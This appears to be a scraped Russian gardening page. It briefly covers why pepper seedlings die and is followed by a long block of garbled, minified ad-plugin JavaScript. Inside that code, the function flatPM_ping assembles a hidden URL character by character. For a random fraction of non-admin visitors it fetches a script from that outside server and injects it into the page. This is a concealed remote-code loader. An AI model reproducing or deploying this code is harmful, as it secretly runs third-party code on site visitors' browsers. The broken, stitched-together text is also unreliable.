  • Повышенная влажность почвенной смеси. Переизбыток воды в грунте влечет за собой гниение корневой системы, появления опасной болезни «черная ножка»;
  • Сухой воздух в помещении. Частой причиной гибели рассады является хранение емкостей на подоконнике, под радиатором отопления. В этом случае перцы достаточно переставить на более подходящее место;
  • Некачественный грунт. Почвенную смесь для высадки семян необходимо готовить с соблюдением рекомендаций специалистов. Также нельзя использовать землю с грядок, где ранее произрастали томаты, баклажаны или картофель.

Четкое соблюдение правил ухода за рассадой позволит овощеводу вырастить хороший урожай перца.

Сколько дней всходит рассада перца:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};